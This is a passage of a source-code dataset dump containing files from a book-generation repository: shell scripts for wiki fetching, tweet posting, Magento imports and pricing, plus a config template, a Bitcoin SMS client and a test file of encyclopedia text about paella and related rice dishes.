tmp/$uuid/onix-working.xml\necho \" <RightsTerritory>WORLD</RightsTerritory>\" >> tmp/$uuid/onix-working.xml\necho \"</SalesRights>\" >> tmp/$uuid/onix-working.xml\necho \"</Product>\" >> tmp/$uuid/onix-working.xml\necho \"</ONIXMessage>\" >> tmp/$uuid/onix-working.xml\n" }, { "alpha_fraction": 0.6389414072036743, "alphanum_fraction": 0.6398865580558777, "avg_line_length": 49.380950927734375, "blob_id": "cfd191137683a7226194b2c7eaa029b3abda7cbb", "content_id": "eb2cc9c060b5493576e80d5b9741bcb48de235b6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 304, "num_lines": 21, "path": "/scripts/includes/seedfortheday.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# gets encylopedia content related to the current date\n\ntoday=$(date +%B\" \"%d)\n\nif [ -n \"$seedfortheday\" ] ; then\n echo \"seed for the day added to seedfile\"\n date +%B\" \"%d >> \"$TMPDIR$uuid/seeds/seedfortheday\"\n \"$PYTHON_BIN\" $scriptpath\"bin/wikifetcher.py\" \\\n --infile \"$TMPDIR$uuid/seeds/seedfortheday\" \\\n --outfile \"$TMPDIR$uuid/wiki/seedfortheday-raw.md\" \\\n --lang \"$wikilocale\"\n\n sed -e s/\\=\\=\\=\\=\\=/JQJQJQJQJQ/g -e s/\\=\\=\\=\\=/JQJQJQJQ/g -e s/\\=\\=\\=/JQJQJQ/g -e s/\\=\\=/JQJQ/g -e s/Edit\\ /\\ /g -e s/JQJQJQJQJQ/\\#\\#\\#\\#\\#/g -e s/JQJQJQJQ/\\#\\#\\#\\#/g -e s/JQJQJQ/\\#\\#\\#/g -e s/JQJQ/\\#\\#/g \"$TMPDIR\"$uuid/wiki/seedfortheday-raw.md | sed G > \"$TMPDIR\"$uuid/wiki/seedfortheday-postpend.md\n sed -i '2d' \"$TMPDIR$uuid/wiki/seedfortheday-postpend.md\"\n echo \" \" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n echo \" \" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n echo \"# On This Day $today\" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\n cat \"$TMPDIR$uuid/wiki/seedfortheday-postpend.md\" >> \"$TMPDIR$uuid/wiki/seedfortheday.md\"\nelse\n echo \"no seed for the day\"\nfi\n" }, { "alpha_fraction": 0.681193470954895, "alphanum_fraction": 0.6925858855247498, "avg_line_length": 21.196786880493164, "blob_id": "65b5bdc3fcf86a178b15623c7d5b141f8168e0d2", "content_id": "fb0a1bd020ca5590c9b337d34bad2e87b970cd8d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5530, "license_type": "permissive", "max_line_length": 82, "num_lines": 249, "path": "/scripts/bin/tweetstorm.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# sends out a tweetstorm\n\n# requires t cli client\n\n# accepts either text file or directory of decimator files\n\necho \"running $0\"\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\n\n. includes/set-variables\n\nif [ \"$environment\" = \"Production\" ] ; then\n\n . /opt/bitnami/apache2/htdocs/pk-production/production/conf/config.txt\n echo \"running prod config\" > ~/which_xform\n\nelse\n\n . /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n echo \"running dev config\" > ~/which_xform\n\nfi\n\necho \"revision number in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\necho \"PATH is\" $PATH\n# default values\n\nsleep_interval=60\n\n# command line processing \n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--decimator_dir)\ndecimator_dir=$2\nshift 2\n;;\n--decimator_dir=*)\ndecimator_dir=${1#*=}\nshift\n;;\n--stormtype)\nstormtype=$2\nshift 2\n;;\n--stormtype=*)\nstormtype=$1{#*=}\nshift\n;;\n--sleep_interval)\nsleep_interval=$2\nshift 2\n;;\n--sleep_interval=*)\nsleep_interval=$1{#*=}\nshift\n;;\n--docname)\ndocname=$2\nshift 2\n;;\n--docname=*)\ndocname=$1{#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\necho \"stormtype is\" $stormtype\n\nif [ ! \"$stormtype\" ] ; then\n echo \"ERROR: option '--stormtype' not given. See --help\" >&2\n exit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n# processing begins\n\ncase \"$stormtype\" in\n\ntxtinput)\n\nif [ ! \"$txtinfile\" ] ; then\n echo \"ERROR: option '--txtinfile' not given. See --help\" >&2\n exit 1\nelse\n\techo \"going on to read txtinfile\"\nfi\n\necho \"txtinfile is \"$txtinfile\nwhile read -r line;\ndo\n\tnumber=$((number + 1))\n\tmessage=\"$number\"\" ... \"\"$line\"\n\techo \"message is\" $message\n\tt update \"$message\"\n\tsleep \"$sleep_interval\"\ndone < \"$txtinfile\"\n\n;;\n\ndecimator)\n\nif [ ! \"$decimator_dir\" ] ; then\n echo \"ERROR: option '--decimator_dir' not given. See --help\" >&2\n exit 1\nelse\n\techo \"going on to post decimator files\"\nfi\n\nmkdir -p -m 755 $scriptpath\"../pk-html/\"$uuid\ncp tmp/$uuid/home.png $scriptpath/../pk-html/$uuid/home.png\ncp tmp/$uuid/wordcloudslide.png $scriptpath/../pk-html/$uuid/wordcloudslide.png\ncp tmp/$uuid/montage.png $scriptpath/../pk-html/$uuid/montage.png\ncp tmp/$uuid/sum1.png $scriptpath/../pk-html/$uuid/sum1.png\ncp tmp/$uuid/sum2.png $scriptpath/../pk-html/$uuid/sum2.png\ncp tmp/$uuid/sum3.png $scriptpath/../pk-html/$uuid/sum3.png\ncp tmp/$uuid/pageburst.png $scriptpath/../pk-html/$uuid/pageburst.png\ncp tmp/$uuid/samplepages.png $scriptpath/../pk-html/$uuid/samplepages.png\ncp tmp/$uuid/keywords.png $scriptpath/../pk-html/$uuid/keywords.png\ncp tmp/$uuid/rrslide.png $scriptpath/../pk-html/$uuid/rrslide.png\n\nmogrify -resize 1650x1275 $scriptpath\"../pk-html/\"$uuid\"/*.png\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Home \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/home.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Wordcloud \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/wordcloudslide.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Image Montage\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/montage.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 1 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum1.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 2 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum2.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sentence 3 \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/sum3.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Page Burst \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/pageburst.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Sample Pages\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/samplepages.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname\"\" Keywords\"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/keywords.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n\nmsg_before=\"Decimating \"\"$docname \" \" Readability Report \"\nurlwc=\"http://pagekicker.com/\"pk-new/development/pk-html/$uuid/rrslide.png\nmessage=\"$msg_before\"\"$urlwc\"\nt update \"$message\"\nsleep \"$sleep_interval\"\n;;\n*)\n\techo \"no storm type given\"\n;;\nesac\n\nexit\n0\n\n\n\n" }, { "alpha_fraction": 0.7347062230110168, "alphanum_fraction": 0.7383403778076172, "avg_line_length": 29, "blob_id": "99242b3b0e6a5d6c7b92d50c147d85cbefbed237", "content_id": "77c85dfb8596c1af05bd5b5b0bf2303a060363cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1651, "license_type": "permissive", "max_line_length": 151, "num_lines": 55, "path": "/scripts/receiving_dock.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n#!bin/bash\n\n# script that manages imports into Magento\n\n# get configuration variables\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n# runs when cron job is triggered every 30 minutes\n\n# check if the importer is available\n\nwhile read backofthetruck\ndo\n\n\techo \"wheeling job #\" $backofthetruck \"onto the receiving dock\"\n\n\techo \"metadatarget path is\" $metadatatargetpath\n\tcp $metadatatargetpath$backofthetruck/current-import.csv $metadatatargetpath\"current-import.csv\"\n\techo \"lifting the boxes off the truck and putting them on the conveyor belt\"\n\n\t# echo \"opening the pod bay door\"\n\t# echo $SFB_MAGENTO_HOME $SFB_PHP_BIN $scriptpath\n\n\t\n\tcd $SFB_MAGENTO_HOME ; $SFB_PHP_BIN $scriptpath\"bin/import_cron.php\"\n\n\timportrows=$(grep 'admin' var/import/current-import.csv | wc -l)\n\n\tcd $scriptpath\n\n\techo \"ran import script and submitted \" $importrows \"jobs (some may be dupes) for import to the Magento store\" | tee --append \"$logdir\"import_log.txt\n\n\ndone<$scriptpath\"import_status/manifest.csv\"\n\nrm $scriptpath\"import_status/manifest.csv\"\n\necho \"the empty truck has pulled away from the dock, we are waiting for the next truck to arrive\" | tee --append \"$logdir\"import_log.txt\n\nexit\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7749999761581421, "avg_line_length": 16, "blob_id": "7eb99514511eefc103cb3e5668406645665ba0c1", "content_id": "ac831257216981aa4fc666f02862c30f20f9eaac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 120, "license_type": "permissive", "max_line_length": 50, "num_lines": 7, "path": "/conf/jobprofiles/imprints/pagekicker/pkcopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "PageKicker\n\[email protected]\n\n1521 Martha Avenue, Ann Arbor, Michigan, USA 48103\n\nFront & back matter copyright PageKicker 2014\n\n" }, { "alpha_fraction": 0.5302663445472717, "alphanum_fraction": 0.6125907897949219, "avg_line_length": 10.44444465637207, "blob_id": "ad04930487ca1220d26fe990fcb98fd8113d86d0", "content_id": "374760c36020c9186983bbeceaa2eee3cca6c3e5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 413, "license_type": "permissive", "max_line_length": 34, "num_lines": 36, "path": "/scripts/includes/pricing-zero.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\n# echo \"doccount is\" $doccount\n\necho \"price is \" $price\necho \"doccount is \"$doccount\n\nif [ \"$doccount\" -lt 9 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 19 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 49 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 99 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 249 ] ; then\n\n\tprice=0.00\n\nelif [ $doccount -lt 499 ] ; then\n\n\tprice=0.00\n\nelse\n\n\tprice=0.00\n\nfi\n\n" }, { "alpha_fraction": 0.7809523940086365, "alphanum_fraction": 0.7851851582527161, "avg_line_length": 944, "blob_id": "51b206befe430142101f20fd489510a19f57d8a5", "content_id": "e0c8876099b0754bda49c5db0cf4c8a63e96b754", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 945, "license_type": "permissive", "max_line_length": 944, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Hemingway.html", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This authorial persona is named in honor of the publisher's late grandmother, Marta Barnes Lamar, a Texan born in 1900 who was a feisty, red-haired female copywriter in the New York of the Roaring Twenties. Among other things, she worked on a campaign for <a href=\"http://www.textilehistory.org/CheneyBrothersSilk.html\">Cheyney Brothers Silk</a>, for whom she commissioned a set of unique posters by <a href=\"http://en.wikipedia.org/wiki/Georgia_O'Keeffe\"> Georgia O'Keeffe</a>. Like Hemingway, she liked short, punchy writing.<p>In later life, she lived in New Orleans, where she was the host of a long-running garden show on the local PBS station. She was often found in her backyard rain forest in the Garden District whacking away at overgrowth with her trusty (and frightening!) machete.<p>Marta writes on many topics for Nimble, but her special publishing interests are the history of the Twenties and Thirties, Texas, New Orleans, and gardening.<p>\n" }, { "alpha_fraction": 0.7246376872062683, "alphanum_fraction": 0.737520158290863, "avg_line_length": 30.049999237060547, "blob_id": "c992014b0a5f496a6114a193a7afa68b0a28e9ab", "content_id": "a462fcddbb9d5bc8042128032904195f09a69be4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 79, "num_lines": 20, "path": "/scripts_python_3/bitcoin/bitcoin-sms-server/sms-client.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport urllib.parse\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import BitTransferRequests\n\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n\n# request the bitcoin-enabled endpoint that you're hosting\ndef testendpoint(sms='I just paid you bitcoin to send you this message!'):\n # In a real application you would escape this message to prevent injections\n message = urllib.parse.quote_plus(sms)\n response = requests.get(url='http://localhost:5000/send-sms?text='+message)\n print((response.text))\n\nif __name__ == '__main__':\n import sys\n testendpoint(sys.argv[1])\n" }, { "alpha_fraction": 0.757676899433136, "alphanum_fraction": 0.7710280418395996, "avg_line_length": 44.15151596069336, "blob_id": "d17f19c155e5056cbdef856e292a2ad731b3412e", "content_id": "e11e13bce6f2d7d565ba3a5842e0deb13628ccf3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1498, "license_type": "permissive", "max_line_length": 124, "num_lines": 33, "path": "/conf/config.txt.save", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized \nMACHINE_NAME=\"Fred's Personal PageKicker Box\"\nSFB_HOME=\"/home/fred/pagekicker-community\"\nLOCAL_DATA=\"$SFB_HOME/local-data/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nSFB_VERSION=`git rev-parse HEAD` #replace with git command that produces unique identifier\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"fred\"\nWEB_HOST=\"http://www.PageKicker.com/\"\nWEB_ROOT=$SFB_HOME\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\" \nAPACHE_ROOT=\"https://www.facebook.com/detroitzoo/videos/1046010298770701/\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nepubcheckjarpath=$scriptpath\"lib/epubcheck-3.0/epubcheck-3.0.jar\" # not used below here no customization should be necessary\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nebooksdelivery=$SFB_MAGENTO_HOME\"ebooks/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuid/\"\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\nebooksdelivery=$SFB_MAGENTO_HOME\"media/ebooks/\"\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7731488943099976, "alphanum_fraction": 0.7770857214927673, "avg_line_length": 40.6483154296875, "blob_id": "f91bc95cdb5d444e1cf5346dfd3e5a53e5f908e4", "content_id": "250ff2de2f072960db4e576dcb236199512e6589", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37229, "license_type": "permissive", "max_line_length": 992, "num_lines": 890, "path": "/test/tmpbody.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " \n \n \n \n# Algorithmic Content\n\n\n\n\n## Paella\n\n\n\nPaella (Valencian pronunciation: [paˈeʎa] or [pəˈeʎə], Spanish: [paˈeʎa]; English approximation: /pɑːˈeɪlə, -ˈeɪljə, -ˈeɪjə, -ˈɛlə, -ˈjɛlə/ or /paɪˈɛlə/) is a Valencian rice dish with ancient roots that originated in its modern form in the mid-19th century near Albufera lagoon on the east coast of Spain adjacent to the city of Valencia. Many non-Spaniards view paella as Spain's national dish, but most Spaniards consider it to be a regional Valencian dish. Valencians, in turn, regard paella as one of their identifying symbols.\n\nTypes of paella include Valencian paella (Spanish: paella valenciana), vegetarian/vegan paella (Spanish: paella de verduras), seafood paella (Spanish: paella de marisco), and mixed paella (Spanish: paella mixta), but there are many others as well. Valencian paella is believed to be the original recipe and consists of white rice, green beans (bajoqueta and tavella), meat (chicken and rabbit), white beans (garrofón), snails, and seasoning such as saffron and rosemary. Another very common but seasonal ingredient is artichoke. Seafood paella replaces meat with seafood and omits beans and green vegetables. Mixed paella is a free-style combination of meat from land animals, seafood, vegetables, and sometimes beans. Most paella chefs use bomba rice due to it being harder to overcook, but Valencians tend to use a slightly stickier (and thus more susceptible to overcooking) variety known as Senia. All types of paellas use olive oil.\n\n\n\n\n\n### Etymology ##\n\nPaella is a Valencian word which derives from the Old French word paelle for pan, which in turn comes from the Latin word patella for pan as well. Patella is also akin to the modern French poêle, the Italian padella and the Old Spanish padilla.\n\nValencians use the word paella for all pans, including the specialized shallow pan used for cooking paellas. However, in most other parts of Spain and throughout Latin America, the term paellera is more commonly used for this pan, though both terms are correct, as stated by the Royal Spanish Academy, the body responsible for regulating the Spanish language in Spain. Paelleras are traditionally round, shallow and made of polished steel with two handles.\n\n\n\n\n\n### History ##\n\n\n\n\n\n#### Possible origins ###\n\n\n\nThe Moors of Moorish Spain began rice cultivation around the 10th century. Consequently, residents of the Valencian region often made casseroles of rice, fish and spices for family gatherings and religious feasts, thus establishing the custom of eating rice in Spain. This led to rice becoming a staple by the 15th century. Afterwards, it became customary for cooks to combine rice with vegetables, beans and dry cod, providing an acceptable meal for Lent. Along Spain's eastern coast, rice was predominantly eaten with fish.\n\nSpanish food historian Lourdes March notes that the dish \"symbolizes the union and heritage of two important cultures, the Roman, which gives us the utensil and the Arab which brought us the basic food of humanity for centuries.\"\n\n\n\n\n\n#### Valencian paella ###\n\nOn special occasions, 18th century Valencians used calderos to cook rice in the open air of their orchards near lake Albufera. Water vole meat was one of the main ingredients of early paellas, along with eel and butter beans. Novelist Vicente Blasco Ibáñez described the Valencian custom of eating water voles in Cañas y Barro (1902), a realistic novel about life among the fishermen and peasants near lake Albufera.\n\nLiving standards rose with the sociological changes of the late 19th century in Spain, giving rise to gatherings and outings in the countryside. This led to a change in paella's ingredients as well, using instead rabbit, chicken, duck and sometimes snails. This dish became so popular that in 1840 a local Spanish newspaper first used the word paella to refer to the recipe rather than the pan.\n\nThe most widely used, complete ingredient list of this era was as follows: short-grain white rice, chicken, rabbit, snails (optional), duck (optional), butter beans, great northern beans, runner beans, artichoke (a substitute for runner beans in the winter), tomatoes, fresh rosemary, sweet paprika, saffron, garlic (optional), salt, olive oil and water. Poorer Valencians, however, sometimes used nothing more than snails for meat. Valencians insist that only these ingredients should go into making modern Valencian paella.\n\n\n\n\n\n#### Seafood and mixed paella ###\n\n\n\nOn the Mediterranean coast, Valencians used seafood instead of meat and beans to make paella. Valencians regard this recipe as authentic as well. In this recipe, the seafood is served in the shell. A variant on this is paella del senyoret which utilizes seafood without shells. Later, however, Spaniards living outside of Valencia combined seafood with meat from land animals and mixed paella was born. This paella is sometimes called \"preparación barroca\" (baroque preparation) due to the variety of ingredients and its final presentation.\n\nDuring the 20th century, paella's popularity spread past Spain's borders. As other cultures set out to make paella, the dish invariably acquired regional influences. Consequently, paella recipes went from being relatively simple to including a wide variety of seafood, meat, sausage, (even chorizo) vegetables and many different seasonings. However, the most globally popular recipe is seafood paella.\n\nThroughout non-Valencian Spain, mixed paella is very popular. Some restaurants in Spain (and many in the United States) that serve this mixed version, refer to it as Valencian paella. However, Valencians insist only the original two Valencian recipes are authentic. They generally view all others as inferior, not genuine or even grotesque.\n\n\n\n\n\n### Basic cooking methods ##\n\nAccording to tradition in Valencia, paella is cooked over an open fire, fueled by orange and pine branches along with pine cones. This produces an aromatic smoke which infuses the paella. Also, dinner guests traditionally eat directly out of the paellera.\n\nSome recipes call for paella to be covered and left to settle for five or ten minutes after cooking.\n\n\n\n\n\n#### Valencian paella ###\n\n\n\nThis recipe is standardized because Valencians consider it traditional and very much part of their culture. Rice in Valencian paella is never braised in oil, as pilaf, though the paella made further southwest of Valencia often is.\n\nHeat oil in a paella.\n\nSauté meat after seasoning with salt.\n\nAdd green vegetables and sauté until soft.\n\nAdd garlic (optional), grated tomatoes, beans and sauté.\n\nAdd paprika and sauté.\n\nAdd water, saffron (and/or food coloring), snails (optional) and rosemary.\n\nBoil to make broth and allow it to reduce by half.\n\nRemove the rosemary once flavour has infused or it starts to fall apart.\n\nAdd rice and simmer until rice is cooked.\n\nGarnish with more fresh rosemary.\n\n\n\n\n\n#### Seafood paella ###\n\n\n\nRecipes for this dish vary somewhat, even in Valencia. Below is a recipe by Juanry Segui, a prominent Valencian chef.\n\nMake a seafood broth from shrimp heads, onions, garlic and bay leaves.\n\nHeat oil in a paellera.\n\nAdd mussels. Cook until they open and then remove.\n\nSauté Norway lobster and whole, deep-water rose shrimp. Then remove both the lobster and shrimp.\n\nAdd chopped cuttlefish and sauté.\n\nAdd shrimp tails and sauté.\n\nAdd chunks of whitefish.\n\nAdd garlic and sauté.\n\nAdd grated tomato and sauté.\n\nAdd rice and braise in sofrito.\n\nAdd paprika and sauté.\n\nAdd seafood broth and then saffron (and/or food coloring).\n\nAdd salt to taste.\n\nAdd the deep-water rose shrimp, mussels and Norway lobster that were set aside.\n\nSimmer until rice is cooked.\n\n\n\n\n\n#### Mixed paella ###\n\n\n\nThere are countless mixed paella recipes. The following method is common to most of these. Seasoning depends greatly on individual preferences and regional influences. However, salt, saffron and garlic are almost always included.\n\nMake a broth from seafood, chicken, onions, garlic, bell peppers and bay leaf.\n\nHeat oil in a paellera.\n\nSear red bell pepper strips and set aside.\n\nSear crustaceans and set aside.\n\nSeason meat lightly with salt and sauté meat until golden brown.\n\nAdd onions, garlic and bell peppers. Sauté until vegetables are tender.\n\nAdd grated tomatoes and sauté.\n\nAdd dry seasonings except for salt.\n\nAdd rice.\n\nBraise rice until covered with sofrito.\n\nAdd broth.\n\nAdd salt to taste.\n\nAdd saffron (and/or food coloring) and mix well.\n\nSimmer until rice is almost cooked.\n\nRe-place crustaceans.\n\nContinue simmering until rice and crustaceans are finished cooking.\n\nGarnish with seared red bell pepper strips.\n\n\n\n\n\n#### For all recipes ###\n\nAfter cooking paella, there is usually a layer of toasted rice at the bottom of the pan, called socarrat in Spain. This is considered a delicacy among Spaniards and is essential to a good paella. The toasted rice develops on its own if the paella is cooked over a burner or open fire. If cooked in an oven, however, it will not. To correct this, place the paellera over a high flame while listening to the rice toast at the bottom of the pan. Once the aroma of toasted rice wafts upwards, it is removed from the heat. The paella must then sit for about five minutes (most recipes recommend the paella be covered with a tea-towel at this point) to absorb the remaining broth.\n\n\n\n\n\n### Competitions and records ##\n\nIt has become a custom at mass gatherings in the Valencian Community (festivals, political campaigns, protests, etc.) to prepare enormous paellas, sometimes to win mention in the Guinness Book of World Records. Chefs use gargantuan paelleras for these events.\n\nValencian restaurateur Juan Galbis claims to have made the world's largest paella with help from a team of workers on 2 October 2001. This paella fed about 110,000 people according to Galbis' former website. Galbis says this paella was even larger than his earlier world-record paella made on 8 March 1992 which fed about 100,000 people. Galbis's record-breaking 1992 paella is listed in Guinness World Records.\n\n\n\n\n\n### Similar dishes ##\n\n\n\nTraditional Valencian cuisine offers recipes similar to paella valenciana and paella de marisco such as arròs negre, arròs al forn, arròs a banda and arròs amb fesols i naps. Fideuà is a noodle dish variation of the paella cooked in a similar fashion, though it may be served with allioli sauce.\n\nThe following is a list of other similar rice dishes:\n\nThieboudienne\n\nBiriyani\n\nArroz a la valenciana\n\nArroz con pollo\n\nArroz con gandules\n\nArròs negre\n\nJambalaya\n\nPilaf\n\nRisotto\n\nJollof rice\n\nArroz meloso\n\nBisi Bele Bath\n\n\n\n\n\n### See also ##\n\n\n\nLatin American cuisine\n\nList of rice dishes\n\nMediterranean cuisine\n\nSpanish cuisine\n\nRisotto\n\nPilaf\n\n\n\n\n\n### Notes ##\n\n\n\n\n\n### References and further reading ##\n\nMarch,, Lourdes (1985). El Libro De La Paella Y De Los Arroces. Madrid: Alianza. ISBN 8420601012. \n\nRíos, Alicia and Lourdes March (1992). The Heritage of Spanish Cooking. New York: Random House. ISBN 0-679-41628-5. \n\n\n\n\n\n### External links ##\n\nPaella Recipe\n\nOriginal Paella Recipe from Valencia Spain\n\nBlog on cooking paella\n\n\n\n## Arròs negre\n\n\n\nArròs negre (Valencian pronunciation: [aˈrɔz ˈneɣɾe], Spanish: arroz negro) is a Valencian and Catalan dish made with cuttlefish (or squid) and rice, somewhat similar to seafood paella. Some mistakenly call it paella negra (\"black paella\" in Spanish), however it is traditionally not called a paella even though it is prepared in the same manner.\n\nArròs negre should not be confused with black rice, the collective name for several cultivars of heirloom rice that have a naturally dark color.\n\nThe traditional recipe for this dish calls for squid ink, cuttlefish or squid, white rice, garlic, green cubanelle peppers, sweet paprika, olive oil and seafood broth. However, many cooks add other seafood as well, such as crab and shrimp.\n\nThe dish's dark color comes from squid ink which also enhances its seafood flavor.\n\nIn addition to Valencia and Catalonia, this dish is popular in Cuba and Puerto Rico where on both islands it is known as arroz con calamares (\"rice with squid\" in Spanish).\n\nFideuà negra (\"black noodles\" in Catalan) is a variation made with noodles instead of rice and is usually served with aioli.\n\n\n\n\n\n### See also ##\n\nCatalan cuisine\n\nList of rice dishes\n\nList of seafood dishes\n\nValencian cuisine\n\n\n\n\n\n### References ##\n\n\n\n## Fideuà\n\n\n\nFideuà (dialectal pronunciation of the Valencian/Catalan word fideuada \"large amount of noodles\") is a seafood dish originally from the coast of Valencia which is similar to paella, and even more to arròs a banda, but with noodles instead of rice. Its main ingredients are: pasta noodles (usually hollow), fish (rockfish, monkfish, cuttlefish, squid), and shellfish (Squilla mantis, shrimp, crayfish). It is seasoned mainly with lemon.\n\n\n\n\n\n### History ##\n\nThe invention of fideuà is attributed to a picturesque story. Gabriel Rodriguez Pastor, 